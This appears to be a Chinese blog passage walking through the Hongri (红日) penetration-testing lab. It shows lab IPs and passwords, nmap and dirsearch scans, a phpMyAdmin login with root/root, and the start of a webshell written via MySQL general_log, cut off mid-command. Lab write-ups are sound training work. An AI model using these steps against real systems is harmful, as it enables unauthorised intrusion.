内网域渗透总结——红日靶场①_红日靶机账号密码

外网:192.168.43.17
内网:192.168.52.143
可以Ping通外网
通192.168.52.138(win2008)
通192.168.52.141(win2003)
小皮必须是自带的,下载的新版本会导致kali机连接目标失败
问题原理:自行理解
win2008—admin@123
192.168.52.138
win2003—admin@123
192.168.52.141
内网两台不出网win互通
win7开启phpstudy
win11访问80端口得到phpstudy探针


​![](https://img-blog.csdnimg.cn/cb83b4d2f1144d39a20193fd6bc35904.png)![](https://img-blog.csdnimg.cn/693a3c27d878480580e9fa0e29ca5349.png)![](https://img-blog.csdnimg.cn/eade48320abb42a6a322d29d09e8c83a.png)


### 二、外网渗透


#### 信息收集


#### 端口扫描



nmap -A -p -min-rate 10000 192.168.43.17
#发现开启了80,3306端口
#访问发现80端口是php探针
#得到了探针的绝对路径 C:/phpst2016/WWW/l.php


​![](https://img-blog.csdnimg.cn/1ca5b3bacb90414e83415e7c8b3290a9.png)


 ![](https://img-blog.csdnimg.cn/b9ebe6d71e314a0eb5a1b6e083e61078.png)


#### 目录爆破



dirsearch -u http://192.168.43.17
#出了一些有用信息
#phpMyadmin,phpinfo.php,l.php,


​![](https://img-blog.csdnimg.cn/6fe384630b704876bdc66baa49c53406.png)


#### 访问phpMyadmin



#发现是一个后台界面
#直接弱口令登录成功
root root


​![](https://img-blog.csdnimg.cn/fc630dbe6bf5465489ca280c4c736487.png)


​


#### 弱口令登录成功


​![](https://img-blog.csdnimg.cn/81ab147e604f48c58ccbec064982574b.png)


#### 拿到webshell



#通过日志文件写入一句话来获取webshell:
#写入webshell-网站根目录下shell,把日志log改为php
SET global general_log = ‘ON’
SET global general_log_f

  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值